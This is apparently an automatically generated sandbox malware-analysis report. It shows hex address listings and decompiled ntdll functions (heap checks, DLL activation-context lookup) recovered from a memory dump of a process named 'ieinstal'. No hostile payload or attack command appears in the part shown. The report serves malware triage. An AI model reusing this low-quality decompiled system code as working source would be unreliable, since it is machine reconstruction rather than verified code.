                                                                                                                0x1e664d19
                                                                                                                0x1e664d1b
                                                                                                                0x1e664d1b
                                                                                                                0x1e664d1e
                                                                                                                0x1e664d1e
                                                                                                                0x1e664d21
                                                                                                                0x1e664d25
                                                                                                                0x1e664d25
                                                                                                                0x1e664d35
                                                                                                                0x1e664d37
                                                                                                                0x1e664d39
                                                                                                                0x1e664d3b
                                                                                                                0x00000000
                                                                                                                0x1e664d3b
                                                                                                                0x00000000
                                                                                                                0x1e664d37
                                                                                                                0x1e664d43
                                                                                                                0x1e664d46
                                                                                                                0x1e664d49
                                                                                                                0x1e664d4b
                                                                                                                0x1e664d4d
                                                                                                                0x1e664d61
                                                                                                                0x1e664d63
                                                                                                                0x1e664d66
                                                                                                                0x1e664d4f
                                                                                                                0x1e664d4f
                                                                                                                0x1e664d51
                                                                                                                0x1e664d54
                                                                                                                0x1e664d56
                                                                                                                0x1e664d56
                                                                                                                0x1e664d6e
                                                                                                                0x1e664d71
                                                                                                                0x1e664d77
                                                                                                                0x1e664d79
                                                                                                                0x1e664d7f
                                                                                                                0x1e664d82
                                                                                                                0x1e664d82
                                                                                                                0x1e664d85
                                                                                                                0x1e664d87
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e664d89
                                                                                                                0x1e664d8b
                                                                                                                0x1e664d8d
                                                                                                                0x1e664daf
                                                                                                                0x00000000
                                                                                                                0x1e664d8f
                                                                                                                0x1e664d8f
                                                                                                                0x1e664d8f
                                                                                                                0x00000000
                                                                                                                0x1e664d8d
                                                                                                                0x1e664d92
                                                                                                                0x1e664da3
                                                                                                                0x1e664da5
                                                                                                                0x1e664da5
                                                                                                                0x1e66486d
                                                                                                                0x1e66486d
                                                                                                                0x1e664870
                                                                                                                0x1e664873
                                                                                                                0x1e664877
                                                                                                                0x1e66487b
                                                                                                                0x1e664881
                                                                                                                0x1e664887
                                                                                                                0x1e66488a
                                                                                                                0x1e66488c
                                                                                                                0x1e664b13
                                                                                                                0x1e664892
                                                                                                                0x1e664892
                                                                                                                0x1e664892
                                                                                                                0x1e664895
                                                                                                                0x1e664897
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e664899
                                                                                                                0x1e66489b
                                                                                                                0x1e66489d
                                                                                                                0x1e664b06
                                                                                                                0x1e664b08
                                                                                                                0x1e664b0b
                                                                                                                0x00000000
                                                                                                                0x1e6648a3
                                                                                                                0x1e6648a3
                                                                                                                0x1e6648a6
                                                                                                                0x1e6648a6
                                                                                                                0x1e6648a6
                                                                                                                0x1e6648a9
                                                                                                                0x1e6648b3
                                                                                                                0x1e6648b6
                                                                                                                0x1e6648bd
                                                                                                                0x1e6648c0
                                                                                                                0x1e6648c3
                                                                                                                0x1e6648c6
                                                                                                                0x1e6648c8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6648ca
                                                                                                                0x1e664aea
                                                                                                                0x1e664aea
                                                                                                                0x1e664aec
                                                                                                                0x1e664af9
                                                                                                                0x1e664af9
                                                                                                                0x1e664afb
                                                                                                                0x1e664afe
                                                                                                                0x00000000
                                                                                                                0x1e664afe
                                                                                                                0x1e664aee
                                                                                                                0x00000000
                                                                                                                0x1e6648d1
                                                                                                                0x1e6648d1
                                                                                                                0x1e6648d4
                                                                                                                0x1e6648d7
                                                                                                                0x1e6648d9
                                                                                                                0x1e6648df
                                                                                                                0x1e6648e3
                                                                                                                0x1e6648e5
                                                                                                                0x1e6648e8
                                                                                                                0x1e664901
                                                                                                                0x1e664903
                                                                                                                0x1e664915
                                                                                                                0x1e66491a
                                                                                                                0x1e66491a
                                                                                                                0x1e664903
                                                                                                                0x1e664923
                                                                                                                0x1e664925
                                                                                                                0x1e66492b
                                                                                                                0x1e66492d
                                                                                                                0x1e664938
                                                                                                                0x1e66493b
                                                                                                                0x1e66493e
                                                                                                                0x1e664940
                                                                                                                0x1e664946
                                                                                                                0x1e66494a
                                                                                                                0x1e66494c
                                                                                                                0x1e66494f
                                                                                                                0x1e664968
                                                                                                                0x1e66496a
                                                                                                                0x1e66497c
                                                                                                                0x1e664981
                                                                                                                0x1e664981
                                                                                                                0x1e66496a
                                                                                                                0x1e66498a
                                                                                                                0x1e66498c
                                                                                                                0x1e664992
                                                                                                                0x1e664994
                                                                                                                0x1e66499d
                                                                                                                0x1e6649a0
                                                                                                                0x1e664a3a
                                                                                                                0x1e664a3a
                                                                                                                0x1e664a3f
                                                                                                                0x1e664a4c
                                                                                                                0x1e664a52
                                                                                                                0x1e664a5d
                                                                                                                0x1e664a5d
                                                                                                                0x1e664a5f
                                                                                                                0x1e664a62
                                                                                                                0x1e664a62
                                                                                                                0x1e664a68
                                                                                                                0x1e664a6e
                                                                                                                0x1e664a70
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e664a72
                                                                                                                0x1e664a74
                                                                                                                0x1e664a7e
                                                                                                                0x1e664a80
                                                                                                                0x1e664af6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e664a76
                                                                                                                0x1e664a76
                                                                                                                0x1e664a79
                                                                                                                0x1e664a7b
                                                                                                                0x00000000
                                                                                                                0x1e664a7b
                                                                                                                0x00000000
                                                                                                                0x1e664a74
                                                                                                                0x1e664a82
                                                                                                                0x1e664a85
                                                                                                                0x1e664aae
                                                                                                                0x1e664ab1
                                                                                                                0x1e664ab3
                                                                                                                0x1e664acb
                                                                                                                0x1e664acb
                                                                                                                0x1e664ab5
                                                                                                                0x1e664abc
                                                                                                                0x1e664abc
                                                                                                                0x1e664a87
                                                                                                                0x1e664a87
                                                                                                                0x1e664a8a
                                                                                                                0x1e664a8c
                                                                                                                0x1e664aa4
                                                                                                                0x1e664a8e
                                                                                                                0x1e664a8e
                                                                                                                0x1e664a8e
                                                                                                                0x1e664a8c
                                                                                                                0x1e664ad1
                                                                                                                0x1e664ad3
                                                                                                                0x1e664ad9
                                                                                                                0x1e664add
                                                                                                                0x1e664adf
                                                                                                                0x1e664adf
                                                                                                                0x1e664adf
                                                                                                                0x1e664ae4
                                                                                                                0x00000000
                                                                                                                0x1e6649a6
                                                                                                                0x1e6649aa
                                                                                                                0x1e6649ad
                                                                                                                0x00000000
                                                                                                                0x1e6649b3
                                                                                                                0x1e6649b3
                                                                                                                0x1e6649b6
                                                                                                                0x1e6649ba
                                                                                                                0x1e6649bc
                                                                                                                0x1e6649bc
                                                                                                                0x1e6649bc
                                                                                                                0x1e6649c1
                                                                                                                0x1e6649c4
                                                                                                                0x1e6649c4
                                                                                                                0x1e6649c6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6649c8
                                                                                                                0x1e6649cb
                                                                                                                0x1e6649cd
                                                                                                                0x1e6649d3
                                                                                                                0x1e6649d7
                                                                                                                0x1e6649d9
                                                                                                                0x1e6649dc
                                                                                                                0x1e6649f5
                                                                                                                0x1e6649f7
                                                                                                                0x1e664a07
                                                                                                                0x1e664a07
                                                                                                                0x1e6649f7
                                                                                                                0x1e664a12
                                                                                                                0x1e664a14
                                                                                                                0x1e664a1a
                                                                                                                0x1e664a1c
                                                                                                                0x1e664a28
                                                                                                                0x1e664a2a
                                                                                                                0x00000000
                                                                                                                0x1e664a1e
                                                                                                                0x1e664a1e
                                                                                                                0x1e664a20
                                                                                                                0x1e664a20
                                                                                                                0x00000000
                                                                                                                0x1e664a1c
                                                                                                                0x1e664a2f
                                                                                                                0x1e664a32
                                                                                                                0x00000000
                                                                                                                0x1e664a32
                                                                                                                0x1e6649ad
                                                                                                                0x1e664996
                                                                                                                0x1e664996
                                                                                                                0x00000000
                                                                                                                0x1e664996
                                                                                                                0x1e66492f
                                                                                                                0x1e66492f
                                                                                                                0x1e664ae7
                                                                                                                0x1e664ae7
                                                                                                                0x1e664ae7
                                                                                                                0x00000000
                                                                                                                0x1e66492d
                                                                                                                0x1e6648a6
                                                                                                                0x00000000
                                                                                                                0x1e66489d
                                                                                                                0x00000000
                                                                                                                0x1e664892
                                                                                                                0x1e664b15
                                                                                                                0x1e664b15
                                                                                                                0x1e664b18
                                                                                                                0x1e664b18
                                                                                                                0x1e664b1a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e664b1c
                                                                                                                0x1e664b20
                                                                                                                0x1e664b3c
                                                                                                                0x1e664b40
                                                                                                                0x1e664b22
                                                                                                                0x1e664b22
                                                                                                                0x1e664b25
                                                                                                                0x1e664b28
                                                                                                                0x1e664b2b
                                                                                                                0x1e664b2d
                                                                                                                0x1e664b2d
                                                                                                                0x1e664b30
                                                                                                                0x1e664b30
                                                                                                                0x1e664b33
                                                                                                                0x1e664b37
                                                                                                                0x1e664b37
                                                                                                                0x1e664b47
                                                                                                                0x1e664b49
                                                                                                                0x1e664b4b
                                                                                                                0x1e664b4d
                                                                                                                0x00000000
                                                                                                                0x1e664b4d
                                                                                                                0x00000000
                                                                                                                0x1e664b49
                                                                                                                0x1e664b55
                                                                                                                0x1e664b58
                                                                                                                0x1e664b5b
                                                                                                                0x1e664b5e
                                                                                                                0x1e664b60
                                                                                                                0x1e664b62
                                                                                                                0x1e664b76
                                                                                                                0x1e664b76
                                                                                                                0x1e664b78
                                                                                                                0x1e664b7b
                                                                                                                0x1e664b64
                                                                                                                0x1e664b64
                                                                                                                0x1e664b66
                                                                                                                0x1e664b69
                                                                                                                0x1e664b6b
                                                                                                                0x1e664b6b
                                                                                                                0x1e664b83
                                                                                                                0x1e664b86
                                                                                                                0x1e664b8c
                                                                                                                0x1e664b8f
                                                                                                                0x1e664b91
                                                                                                                0x1e664b97
                                                                                                                0x1e664ba0
                                                                                                                0x1e664ba0
                                                                                                                0x1e664ba3
                                                                                                                0x1e664ba5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e664ba7
                                                                                                                0x1e664ba9
                                                                                                                0x1e664bab
                                                                                                                0x1e664cad
                                                                                                                0x1e664caf
                                                                                                                0x00000000
                                                                                                                0x1e664bb1
                                                                                                                0x1e664bb1
                                                                                                                0x1e664bb1
                                                                                                                0x00000000
                                                                                                                0x1e664bab
                                                                                                                0x1e664bb4
                                                                                                                0x1e664bbd
                                                                                                                0x1e664bc2
                                                                                                                0x1e664bc5
                                                                                                                0x1e664bc8
                                                                                                                0x1e664bcc
                                                                                                                0x1e664bcf
                                                                                                                0x1e664bd1
                                                                                                                0x1e664bd1
                                                                                                                0x1e664bd3
                                                                                                                0x1e664bd9
                                                                                                                0x1e664be5
                                                                                                                0x1e664bec
                                                                                                                0x1e664bee
                                                                                                                0x1e664bf1
                                                                                                                0x1e664bf3
                                                                                                                0x1e664bf3
                                                                                                                0x1e664bf3
                                                                                                                0x1e664bf3
                                                                                                                0x1e664bf6
                                                                                                                0x1e664bf9
                                                                                                                0x1e664bfb
                                                                                                                0x1e664c5d
                                                                                                                0x1e664c5d
                                                                                                                0x1e664c60
                                                                                                                0x1e664c66
                                                                                                                0x1e664c69
                                                                                                                0x1e664bfd
                                                                                                                0x1e664bfd
                                                                                                                0x1e664c00
                                                                                                                0x1e664c06
                                                                                                                0x1e664c0a
                                                                                                                0x1e664c0c
                                                                                                                0x1e664c0f
                                                                                                                0x1e664c28
                                                                                                                0x1e664c2a
                                                                                                                0x1e664c3d
                                                                                                                0x1e664c42
                                                                                                                0x1e664c42
                                                                                                                0x1e664c45
                                                                                                                0x1e664c45
                                                                                                                0x1e664c4e
                                                                                                                0x1e664c50
                                                                                                                0x1e664c56
                                                                                                                0x1e664c58
                                                                                                                0x1e664c5b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e664c5b
                                                                                                                0x1e664c6c
                                                                                                                0x1e664c6e
                                                                                                                0x1e664c72
                                                                                                                0x1e664c78
                                                                                                                0x1e664c80
                                                                                                                0x1e664c83
                                                                                                                0x1e664c88
                                                                                                                0x1e664c8b
                                                                                                                0x1e664c8b
                                                                                                                0x1e664c8b
                                                                                                                0x1e664c8b
                                                                                                                0x1e664c6e
                                                                                                                0x1e664b91
                                                                                                                0x1e664c8e
                                                                                                                0x1e664c92
                                                                                                                0x1e664ca0
                                                                                                                0x1e664ca6
                                                                                                                0x1e664ca6
                                                                                                                0x1e664c92
                                                                                                                0x1e664dbd
                                                                                                                0x1e664dc0
                                                                                                                0x1e664dc5
                                                                                                                0x1e664dc7
                                                                                                                0x1e664dcb
                                                                                                                0x1e664dd0
                                                                                                                0x1e664dda
                                                                                                                0x1e664ddd
                                                                                                                0x1e664ddf
                                                                                                                0x1e664de0
                                                                                                                0x1e664de4
                                                                                                                0x1e664de4
                                                                                                                0x1e664ddd
                                                                                                                0x1e664dec
                                                                                                                0x1e664def
                                                                                                                0x1e664df5
                                                                                                                0x1e664df8
                                                                                                                0x1e664dfc
                                                                                                                0x1e664e05
                                                                                                                0x1e664e0b
                                                                                                                0x1e664e0b
                                                                                                                0x1e664e0b
                                                                                                                0x1e664e11
                                                                                                                0x1e664e17
                                                                                                                0x1e664e1b
                                                                                                                0x1e664e22
                                                                                                                0x1e664e2c
                                                                                                                0x1e664e2c
                                                                                                                0x00000000
                                                                                                                0x1e664e22
                                                                                                                0x1e66482e
                                                                                                                0x1e66482e
                                                                                                                0x1e664834
                                                                                                                0x00000000
                                                                                                                0x1e664836
                                                                                                                0x1e66483a
                                                                                                                0x1e66483e
                                                                                                                0x00000000
                                                                                                                0x1e664840
                                                                                                                0x1e664843
                                                                                                                0x1e664847
                                                                                                                0x1e66484e
                                                                                                                0x00000000
                                                                                                                0x1e66484e
                                                                                                                0x1e66483e
                                                                                                                0x1e664834
                                                                                                                0x1e6647f0
                                                                                                                0x1e6647f5
                                                                                                                0x1e6647f8
                                                                                                                0x00000000
                                                                                                                0x1e6647fa
                                                                                                                0x1e6647fd
                                                                                                                0x1e664801
                                                                                                                0x1e664e30
                                                                                                                0x1e664e30
                                                                                                                0x1e664e30
                                                                                                                0x1e6647f8
                                                                                                                0x1e664e33
                                                                                                                0x1e664e35
                                                                                                                0x1e664e35
                                                                                                                0x1e663dc7
                                                                                                                0x1e663dc7
                                                                                                                0x1e663dcd
                                                                                                                0x1e663dd7
                                                                                                                0x1e663ddc
                                                                                                                0x1e663e00
                                                                                                                0x1e663e03
                                                                                                                0x1e663e17
                                                                                                                0x1e663e1e
                                                                                                                0x1e663e25
                                                                                                                0x1e663e6f
                                                                                                                0x1e663e79
                                                                                                                0x1e663e7b
                                                                                                                0x00000000
                                                                                                                0x1e663e27
                                                                                                                0x1e663e27
                                                                                                                0x1e663e31
                                                                                                                0x1e663e3b
                                                                                                                0x1e663e42
                                                                                                                0x1e663e52
                                                                                                                0x1e663e55
                                                                                                                0x1e663e5f
                                                                                                                0x1e663e61
                                                                                                                0x1e66501b
                                                                                                                0x1e66501b
                                                                                                                0x1e66501b
                                                                                                                0x1e663e05
                                                                                                                0x1e663e05
                                                                                                                0x1e663e08
                                                                                                                0x1e663e0f
                                                                                                                0x00000000
                                                                                                                0x1e663e0f
                                                                                                                0x1e663dde
                                                                                                                0x1e663de1
                                                                                                                0x1e663de4
                                                                                                                0x1e663deb
                                                                                                                0x1e663df2
                                                                                                                0x1e663e80
                                                                                                                0x1e663e80
                                                                                                                0x1e663e84
                                                                                                                0x1e663e88
                                                                                                                0x1e663e8b
                                                                                                                0x1e663e8f
                                                                                                                0x1e663e94
                                                                                                                0x1e663e9e
                                                                                                                0x1e663ea1
                                                                                                                0x1e663ea3
                                                                                                                0x1e663ea8
                                                                                                                0x1e663ea8
                                                                                                                0x1e663ea1
                                                                                                                0x1e663ead
                                                                                                                0x1e663eb0
                                                                                                                0x1e663eb6
                                                                                                                0x1e663eb6
                                                                                                                0x1e663eb9
                                                                                                                0x1e663ebb
                                                                                                                0x1e663ebd
                                                                                                                0x1e663ec3
                                                                                                                0x1e663ec5
                                                                                                                0x1e663ec5
                                                                                                                0x1e663ec7
                                                                                                                0x1e663ec9
                                                                                                                0x1e663ecb
                                                                                                                0x1e663f03
                                                                                                                0x00000000
                                                                                                                0x1e663ecd
                                                                                                                0x1e663ecd
                                                                                                                0x1e663ed0
                                                                                                                0x1e663ed0
                                                                                                                0x00000000
                                                                                                                0x1e663ecb
                                                                                                                0x1e663ed6
                                                                                                                0x1e663ed8
                                                                                                                0x1e663ef7
                                                                                                                0x1e663ef7
                                                                                                                0x1e663eda
                                                                                                                0x1e663eda
                                                                                                                0x1e663edc
                                                                                                                0x00000000
                                                                                                                0x1e663ede
                                                                                                                0x1e663ede
                                                                                                                0x1e663ee1
                                                                                                                0x1e663ee5
                                                                                                                0x1e663ee7
                                                                                                                0x1e663ee7
                                                                                                                0x1e663ee7
                                                                                                                0x1e663eef
                                                                                                                0x1e663eef
                                                                                                                0x1e663edc
                                                                                                                0x00000000
                                                                                                                0x1e663ed8
                                                                                                                0x1e663ddc
                                                                                                                0x1e66501e
                                                                                                                0x1e665025
                                                                                                                0x1e665033
                                                                                                                0x1e665041
                                                                                                                0x1e663d15
                                                                                                                0x1e663d15
                                                                                                                0x1e663d19
                                                                                                                0x1e663d1e
                                                                                                                0x1e663d24
                                                                                                                0x00000000
                                                                                                                0x1e663d26
                                                                                                                0x1e663d26
                                                                                                                0x1e663d2c
                                                                                                                0x00000000
                                                                                                                0x1e663d2e
                                                                                                                0x1e663d31
                                                                                                                0x1e663d39
                                                                                                                0x1e663d47
                                                                                                                0x1e663d47
                                                                                                                0x1e663d2c
                                                                                                                0x1e663d24
                                                                                                                0x1e663cde
                                                                                                                0x1e663cec
                                                                                                                0x1e663cf6
                                                                                                                0x1e663d04
                                                                                                                0x1e663d04

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                • API String ID: 0-3178619729
                                                                                                                • Opcode ID: e6b993befc63a5729d49ee5cfcf716f45bb896f441288020d960a5da7f7af811
                                                                                                                • Instruction ID: 0cd8369b4c78a14e5cf7b17901087b9072e15c014a93fd39c3d34f72fb6fd339
                                                                                                                • Opcode Fuzzy Hash: e6b993befc63a5729d49ee5cfcf716f45bb896f441288020d960a5da7f7af811
                                                                                                                • Instruction Fuzzy Hash: 25E2B174A10265DFDB15CF69C490BA9BBF2FF4E304F548299E845AB385D734A841CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E684C3D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 41%
                                                                                                                			E1E684C3D(void* __ecx) {
				char _v8;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t45;
				void* _t47;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_push(__ecx);
				_t45 = 0;
				_t42 = __ecx;
				_t51 =  *0x1e7465e4; // 0x7665f0e0
				if(_t51 == 0) {
					L10:
					return _t45;
				}
				_t40 =  *((intOrPtr*)(__ecx + 0x18));
				_t36 =  *0x1e745b24; // 0x2c52e20
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t36) {
					_t24 =  *((intOrPtr*)(_t42 + 0x28));
					if(_t42 == _t36) {
						_t47 = 0x5c;
						if( *_t24 == _t47) {
							_t39 = 0x3f;
							if( *((intOrPtr*)(_t24 + 2)) == _t39 &&  *((intOrPtr*)(_t24 + 4)) == _t39 &&  *((intOrPtr*)(_t24 + 6)) == _t47 &&  *((intOrPtr*)(_t24 + 8)) != 0 &&  *((short*)(_t24 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t24 + 0xc)) == _t47) {
								_t24 = _t24 + 8;
							}
						}
					}
					_t48 =  *0x1e7465e4; // 0x7665f0e0
					 *0x1e7491e0(_t40, _t24,  &_v8);
					_t45 =  *_t48();
					if(_t45 >= 0) {
						L8:
						_t27 = _v8;
						if(_t27 != 0) {
							if( *((intOrPtr*)(_t42 + 0x48)) != 0) {
								E1E6526A0(_t27,  *((intOrPtr*)(_t42 + 0x48)));
								_t27 = _v8;
							}
							 *((intOrPtr*)(_t42 + 0x48)) = _t27;
						}
						if(_t45 < 0) {
							if(( *0x1e7437c0 & 0x00000003) != 0) {
								E1E6CE692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t45);
							}
							if(( *0x1e7437c0 & 0x00000010) != 0) {
								asm("int3");
							}
						}
						goto L10;
					}
					if(_t45 != 0xc000008a) {
						if(_t45 != 0xc000008b && _t45 != 0xc0000089 && _t45 != 0xc000000f && _t45 != 0xc0000204 && _t45 != 0xc0000002) {
							if(_t45 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1e7437c0 & 0x00000005) != 0) {
						_push(_t45);
						_t18 = _t42 + 0x24; // 0x123
						E1E6CE692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t18);
						_t49 = _t49 + 0x1c;
					}
					_t45 = 0;
					goto L8;
				} else {
					goto L10;
				}
			}















                                                                                                                0x1e684c42
                                                                                                                0x1e684c47
                                                                                                                0x1e684c4a
                                                                                                                0x1e684c4c
                                                                                                                0x1e684c52
                                                                                                                0x1e684cb8
                                                                                                                0x1e684cbe
                                                                                                                0x1e684cbe
                                                                                                                0x1e684c5a
                                                                                                                0x1e684c5d
                                                                                                                0x1e684c69
                                                                                                                0x1e684c6f
                                                                                                                0x1e684c74
                                                                                                                0x1e684cd6
                                                                                                                0x1e684cda
                                                                                                                0x1e6c33b9
                                                                                                                0x1e6c33be
                                                                                                                0x1e6c33f7
                                                                                                                0x1e6c33f7
                                                                                                                0x1e6c33be
                                                                                                                0x1e684cda
                                                                                                                0x1e684c76
                                                                                                                0x1e684c84
                                                                                                                0x1e684c8c
                                                                                                                0x1e684c90
                                                                                                                0x1e684ca9
                                                                                                                0x1e684ca9
                                                                                                                0x1e684cae
                                                                                                                0x1e684ce4
                                                                                                                0x1e684cee
                                                                                                                0x1e684cf3
                                                                                                                0x1e684cf3
                                                                                                                0x1e684ce6
                                                                                                                0x1e684ce6
                                                                                                                0x1e684cb2
                                                                                                                0x1e6c3463
                                                                                                                0x1e6c347b
                                                                                                                0x1e6c3480
                                                                                                                0x1e6c348a
                                                                                                                0x1e6c3490
                                                                                                                0x1e6c3490
                                                                                                                0x1e6c348a
                                                                                                                0x00000000
                                                                                                                0x1e684cb2
                                                                                                                0x1e684c98
                                                                                                                0x1e684cc5
                                                                                                                0x1e6c3429
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6c342f
                                                                                                                0x1e684cc5
                                                                                                                0x1e684ca1
                                                                                                                0x1e6c3434
                                                                                                                0x1e6c3435
                                                                                                                0x1e6c344f
                                                                                                                0x1e6c3454
                                                                                                                0x1e6c3454
                                                                                                                0x1e684ca7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 1E6C344A, 1E6C3476
                                                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 1E6C3466
                                                                                                                • LdrpFindDllActivationContext, xrefs: 1E6C3440, 1E6C346C
                                                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E6C3439
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                • API String ID: 0-3779518884
                                                                                                                • Opcode ID: a14142e17286188f7a689f7b052b9656c600cf59fe8a36da5db962465004df93
                                                                                                                • Instruction ID: 4f1da0863f46cb6e6b8bbeed6e997cc8cee97e18cdf3b977d8b5809b47fe41f8
                                                                                                                • Opcode Fuzzy Hash: a14142e17286188f7a689f7b052b9656c600cf59fe8a36da5db962465004df93
                                                                                                                • Instruction Fuzzy Hash: EC31E572E54392AFEB11DB09C894E59B7AEEB07368FC2836EE80467250D7619D80C391
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E700D24 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                • API String ID: 2994545307-336120773
                                                                                                                • Opcode ID: d8e6d29d6283c4d4930ecb6be4081e15ba0c59fb1cd3335cfe26e01eab1111e9
                                                                                                                • Instruction ID: 7d15f91364c9676c5d2280ac39801c0dda66a5beabfad329ee756a610532f391
                                                                                                                • Opcode Fuzzy Hash: d8e6d29d6283c4d4930ecb6be4081e15ba0c59fb1cd3335cfe26e01eab1111e9
                                                                                                                • Instruction Fuzzy Hash: DB310539211162FFE302DF68C880F9677E9EF06774F640B55E402EB2A0D731AA40CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E661EB2 Relevance: 4.3, Strings: 3, Instructions: 563COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 63%
                                                                                                                			E1E661EB2(signed char __ecx, signed short* __edx, signed int* _a4, char _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				unsigned int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t192;
				intOrPtr _t193;
				signed short _t196;
				signed int _t202;
				signed short _t203;
				intOrPtr _t209;
				signed int _t213;
				signed int _t216;
				signed short _t221;
				intOrPtr _t222;
				signed short _t225;
				signed int _t227;
				signed short _t228;
				intOrPtr _t234;
				signed int _t238;
				signed int _t241;
				signed int _t251;
				char _t259;
				signed short _t260;
				intOrPtr _t261;
				signed short _t263;
				intOrPtr _t264;
				signed int _t267;
				signed int _t268;
				signed short _t271;
				intOrPtr _t282;
				signed int _t288;
				signed int _t291;
				signed int _t293;
				signed int _t295;
				intOrPtr _t301;
				signed int _t305;
				signed int _t308;
				signed short* _t319;
				void* _t321;
				signed int* _t323;
				signed short* _t324;
				void* _t325;
				signed short* _t326;
				signed char _t327;
				intOrPtr _t329;
				signed int _t336;
				signed short* _t339;
				signed char _t340;
				intOrPtr _t344;
				signed int _t350;
				signed short* _t355;
				void* _t356;
				signed short* _t357;
				signed short _t358;
				signed char _t360;
				intOrPtr _t362;
				intOrPtr* _t368;
				signed char _t369;
				intOrPtr _t370;
				signed int _t377;
				signed int* _t380;
				signed int _t381;
				signed short _t383;
				signed int _t385;
				signed int _t389;
				signed int* _t390;
				unsigned int _t394;
				signed short _t396;
				signed short _t398;
				signed int _t400;
				signed int _t403;
				signed short* _t409;
				signed int* _t410;
				signed char _t416;
				void* _t418;
				void* _t419;

				_t322 = __ecx;
				_t419 = _t418 - 0x1c;
				_t319 = __edx;
				_t409 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				_t416 = __ecx;
				if(_t409 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t409[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L7:
					_t380 = _a4;
					goto L8;
				} else {
					if( *(__ecx + 0x4c) != 0) {
						 *_t409 =  *_t409 ^  *(__ecx + 0x50);
						if(_t409[1] != (_t409[0] ^  *_t409 ^ _t409[1])) {
							_push(__ecx);
							E1E70D646(__edx, __ecx, _t409, _t409, __ecx, __eflags);
						}
					}
					_t259 = _a8;
					_v5 = _t259;
					if(_t259 != 0) {
						_t396 = _t319[6];
						_t355 =  &(_t319[4]);
						_t260 =  *_t355;
						_v12 = _t260;
						_v16 = _t396;
						_t261 =  *((intOrPtr*)(_t260 + 4));
						__eflags =  *_t396 - _t261;
						if( *_t396 != _t261) {
